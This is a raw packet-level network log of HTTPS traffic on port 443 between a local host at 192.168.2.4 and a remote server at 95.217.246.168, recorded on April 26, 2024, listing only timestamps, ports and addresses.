Apr 26, 2024 21:35:23.652107000 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.652174950 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.652184963 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.652226925 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.656398058 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.656424046 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.656527042 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.656538963 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.656574965 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.661047935 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.661071062 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.661149979 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.661164999 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.661202908 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.664755106 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.664781094 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.664822102 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.664829016 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.664845943 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.664864063 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.668452024 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.668471098 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.668523073 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.668528080 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.668556929 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.675416946 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.675431967 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.675523996 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.675530910 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.675575018 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.678599119 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.678616047 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.678682089 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.678688049 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.678740025 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.682404041 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.682420969 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.682481050 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.682488918 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.682821035 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.686091900 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.686108112 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.686183929 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.686196089 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.686239958 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.690349102 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.690365076 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.690437078 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.690443993 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.690484047 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.694003105 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.694020033 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.694097042 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.694123030 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.694159985 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.697876930 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.697899103 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.697973967 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.697989941 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.698024035 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.702346087 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.702369928 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.702444077 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.702455044 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.702495098 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.706518888 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.706536055 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.706598043 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.706617117 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.706653118 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.710037947 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.710055113 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.710108995 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.710119009 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.710153103 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.713749886 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.713768005 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.713829041 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.713838100 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.713871002 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.717837095 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.717860937 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.717921972 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.717931986 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.717955112 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.719480038 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.721172094 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.721189022 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.721244097 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.721251011 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.721288919 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.724750042 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.724770069 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.724826097 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.724832058 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.724873066 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.727933884 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.727950096 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.727998972 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.728003979 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.728037119 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.731928110 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.731951952 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.732002974 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.732012987 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.732039928 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.732053041 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.735114098 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.735130072 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.735187054 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.735193014 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.735235929 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.738549948 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.738564968 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.738626957 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.738632917 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.738667011 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.741993904 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.742007971 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.742068052 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.742074013 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.742115021 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.745043993 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.745059967 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.745117903 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.745122910 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.745158911 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.748177052 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.748193026 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.748250008 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.748256922 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.748284101 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.751120090 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.751140118 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.751157999 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.751163960 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.751178026 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.751209974 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.754988909 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.755007982 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.755070925 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.755078077 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.755114079 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.758141041 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.758157015 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.758209944 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.758215904 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.758250952 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.760927916 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.760945082 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.760998011 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.761003017 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.761037111 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.764029980 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.764044046 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.764106989 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.764112949 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.764147997 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.767477989 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.767501116 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.767550945 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.767555952 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.767591000 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.770628929 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.770646095 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.770693064 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.770699978 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.770736933 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.773345947 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.773379087 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.773408890 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.773415089 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.773437977 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.773451090 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.775948048 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.775964022 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.776010036 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.776015997 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.776051044 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.779951096 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.779973984 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.780019045 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.780028105 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.780050039 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.780061960 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.782120943 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.782139063 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.782188892 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.782195091 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.782233953 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.785027027 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.785059929 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.785092115 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.785096884 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.785123110 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.785180092 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.788372993 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.788389921 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.788439035 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.788444042 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.788476944 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.791100025 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.791126013 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.791188002 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.791188002 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.791193962 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.791225910 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.794091940 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.794110060 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.794162989 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.794167995 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.794194937 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.794218063 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.796452999 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.796475887 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.796521902 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.796528101 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.796560049 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.799627066 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.799652100 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.799694061 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.799700975 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.799722910 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.799735069 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.802325964 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.802346945 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.802390099 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.802395105 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.802416086 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.802437067 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.805529118 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.805546999 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.805596113 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.805600882 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.805634022 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.808073044 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.808089972 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.808149099 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.808154106 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.808180094 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.808192968 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.810638905 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.810656071 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.810717106 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.810720921 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.810759068 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.813239098 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.813254118 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.813312054 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.813317060 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.813353062 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.815958977 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.815974951 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.816030979 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.816035032 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.816071033 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.820417881 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.820439100 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.820487022 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.820494890 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.820539951 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.826014042 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.826031923 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.826127052 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.826134920 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.826176882 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.828741074 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.828756094 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.828814983 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.828823090 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.828862906 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.831197977 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.831214905 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.831271887 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.831279039 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.831321955 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.833543062 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.833559036 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.833609104 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.833616018 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.833781004 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.833781004 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.837089062 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.837104082 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.837203026 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.837228060 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.837270021 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.839046955 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.839061975 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.839117050 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.839123964 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.839163065 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.849750042 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.849792004 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.849857092 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.849863052 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.849885941 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.849901915 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.852653027 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.852675915 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.852729082 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.852735043 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.852755070 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.852777958 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.854672909 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.854696989 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.854736090 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.854741096 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.854768038 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.854780912 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.859493971 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.859514952 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.859581947 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.859589100 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.859627962 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.867371082 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.867397070 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.867453098 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.867485046 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.867492914 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.867522955 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.867544889 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.867546082 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.867588997 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.868022919 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.868042946 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.947356939 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.947384119 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.947443008 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.947936058 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.947948933 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:24.478946924 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:24.479053020 CEST	49739	443	192.168.2.4	95.217.246.168
